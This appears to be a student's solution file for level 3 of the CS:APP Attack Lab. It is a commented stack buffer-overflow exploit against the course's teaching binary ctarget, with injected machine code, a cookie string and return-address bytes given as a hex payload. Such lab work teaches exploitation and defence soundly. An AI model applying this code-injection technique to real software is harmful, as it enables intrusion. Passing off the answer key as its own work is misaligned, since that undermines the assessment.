/*
Similar to level2 code injection: replace the original return address with the
address of injected code, so that when getbuf() returns, it would execute
the injected code rather than return the control to test().

The expoit string should contains the string hex representation of the cookie,
storing the pointer to the cookie hex string into %rdi, and transfer control
to touch3 function.
As all the above procedures happen after the "ret" in getbuf() is called, the
space allocated by getbuf() have all been freed. Function hexmatch() and strncmp()
both pushes to the stack, thus you should place the exploit string above the
return address.


IMPORTANT: When we write to the buffer, we write from lower address to higher
address, and when the object code is read from the program to be executed, it
is also read from lower address to higher address. This is illustrated by the
picture, where for each quadword, the bytes on the right have lower address than
bytes on the left.
Thus, we you input object code generated by "objdump -d" into exploit string,
you do not have to reverse it. However, as x86 system uses little endian,
requiring that the Least Significant Byte occupies the lowest address,
you need to reverse the ordering of a constant(numerical constant,
or address) when you put it into the exploit string.

ASCII code table
Hex  Char
30    0
31    1
32    2
33    3
34    4
35    5
36    6
37    7
38    8
39    9
61    a
62    b
63    c
64    d
65    e
66    f
00    '\0'

0x59b997fa => 35 39 62 39 39 37 66 61. Also you need to have a null character at
the end of the string. So the input is "35 39 62 39 39 37 66 61 00".


The stack after allocating space in getbuf:
---------------------------
|11 11 11 c3 fa 18 40 00  | 0x5561dcc0
---------------------------
|68 55 61 dc a8 c7 c7 48  | 0x5561dcb8
---------------------------
|11 11 11 11 11 11 11 00  | 0x5561dcb0
---------------------------
|61 66 37 39 39 62 39 35  | 0x5561dca8, the start of the cookie string representation
---------------------------
|00 00 00 00 55 61 dc b8  | 0x5561dca0, return address after calling Gets()
---------------------------
|00 00 00 00 00 00 00 00  |
---------------------------
|00 00 00 00 00 00 00 00  |
---------------------------
|00 00 00 00 00 00 00 00  |
---------------------------
|00 00 00 00 00 00 00 00  |
---------------------------
|00 00 00 00 00 00 00 00  |
---------------------------

48 c7 c7 a8 dc 61 55 	mov    $0x5561dca8,%rdi
68 fa 18 40 00       	pushq  $0x4018fa
c3                   	retq

./hex2raw < CI_level3/level3_CI_solution.txt | ./ctarget -q
*/


00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
b8 dc 61 55 00 00 00 00
35 39 62 39 39 37 66 61
00 11 11 11 11 11 11 11
48 c7 c7 a8 dc 61 55 68
fa 18 40 00 c3 0a
